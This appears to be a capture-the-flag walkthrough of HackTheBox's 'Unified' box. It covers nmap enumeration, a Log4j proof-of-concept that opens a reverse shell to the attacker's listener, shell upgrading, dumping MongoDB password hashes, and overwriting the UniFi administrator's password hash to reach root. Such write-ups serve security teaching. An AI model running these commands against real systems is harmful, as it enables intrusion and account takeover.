Unified
Summary
Part of Starting Point's Tier 2 boxes, Unified revolves around exploiting the Log4j vulnerability. Securing the initial foothold entails identifying the application's version through meticulous enumeration of the web server. Subsequently, leveraging a readily available allows us to gain access to the application using the administrator
account. Further reconnaissance within the site exposes plaintext SSH credentials, allowing us to root the box.
1
Web server enumeration
Browser
Web app's version
2
Researching
Browser
Log4j vulnerability &
3
Using
Foothold
5
Web server enumeration
Browser
Privilege escalation
Recon
Port Scan
As always, let's start with a port scan. For efficiency, we will run a fast (-T5 --min-rate 10000
) all-ports (-p-
) scan first to find out which of them are open (-open
), and then we will do a version scanning (-sV
) as well as use Nmap's default scripts (-sC
) against open ports only.
# Scanning all ports at maximum speed
$ sudo nmap 10.129.158.126 -T5 --min-rate 10000 -open -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 17:37 BST
Nmap scan report for 10.129.158.126
Host is up (0.038s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
6789/tcp open ibm-db2-admin
8080/tcp open http-proxy
8443/tcp open https-alt
8843/tcp open unknown
8880/tcp open cddbp-alt
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
# Version-scanning the specified ports at max speed plus using default scripts
$ sudo nmap 10.129.158.126 -T5 --min-rate 10000 -p 22,6789,8080,8443,8843,8880 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3
<SNIP>
6789/tcp open ibm-db2-admin?
8080/tcp open http-proxy
|_http-title: Did not follow redirect to https://10.129.158.126:8443/manage
|_http-open-proxy: Proxy might be redirecting requests
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
<SNIP>
8443/tcp open ssl/nagios-nsca Nagios NSCA
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after: 2024-04-03T21:37:24
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
8843/tcp open ssl/unknown
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
<SNIP>
8880/tcp open cddbp-alt?
Based on Nmap's output, we can note some things down:
There is an SSH port open (
22
) which might represent the way to access the box.There is an HTTP port (
8080
) which redirects tohttps://10.129.158.126:8443/manage
which seems interesting.The port
6789
seems to be used for an application called UniFi Mobile Speed Test.The last port (
8880
) is related with a protocol called CDDB and it's also related with the UniFi Network.
Web Server Enumeration
By visiting the redirected URL we found above, we land on the UniFi login page which also include its version: 6.4.54
(Figure 1).

Foothold
Log4j
Since we know the application's version, we can check if any known vulnerability exists. Doing that, reveals the Log4j vulnerability (Figure 2.1) as well as a GitHub repository with a (Figure 2.2).

UniFi 6.4.54
.The SprocketSecurity article includes both an exploitation and a post-exploitation route, but let's first try the PoC as it involves less steps. By opening a listener (Figure 3.1) and following the PoC's execution instructions (Figure 3.2), we indeed achieve and secure our foothold (Figure 3.3).
# executing the PoC
sudo python3 exploit.py -u https://10.129.96.149:8443 -i 10.10.14.147 -p 1337

Shell Upgrade
Before searching for the flag, we can first upgrade our shell (Figure 4).
# Checking if script is available
which script
# Spawning the bash shell
script /dev/null -c /bin/bash
# Backgrounding the shell (CTRL+Z)
^Z
# Checking the configurations of our local shell
echo $TERM && stty size
# Disabling echo, passing I/O straight through, and foregrounding the shell
stty raw -echo; fg
# Setting terminals dimensions
stty rows 51 cols 209
# Exproting terminal
export TERM=xterm

script
.We can now read the user.txt
flag within the home directory of the sole user of the box.
# Checking users
unifi@unified:/unifi/data$ ls /home
michael
# Reading the user flag
unifi@unified:/unifi/data$ cat /home/michael/user.txt
6ce<REDACTED>127
Privilege Escalation
Mongodb Exploitation
The post-exploitation part of the article refers to a mongodb from which we can dump password hashes from. Let's check if we can do that (Figure 5).
# Dumping the password hashes
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

Next, according to the article, we can encrypt a new password (Figure 6.1) and use it to change the administrator
's password (Figure 6.2), so we can then use it to log in into the UniFi portal as a privileged user (Figure 7).
# Encrypting the new password
mkpasswd -m sha-512 Password123!
# Changing the administrator's password
mongo --port 27117 ace --eval 'db.admin.update({"_id" : ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$Zpy/bK4oaMXbjkwG$gPVsT76.dDkLpzgvEZm39v2kvkqfytwFzuzOHOW5MmkgFtN9UXDbg0FZ58hckZEq2g83mE9bWNqXDi6itVvd91"}})'

administrator
's password.
administrator
.UniFi Enumeration
By enumerating the UniFi portal, we can find the root
's plaintext password (Figure 8) which we can use right away and read the root.txt
flag 🚩 (Figure 9).

root
's SSH password.
Last updated
Was this helpful?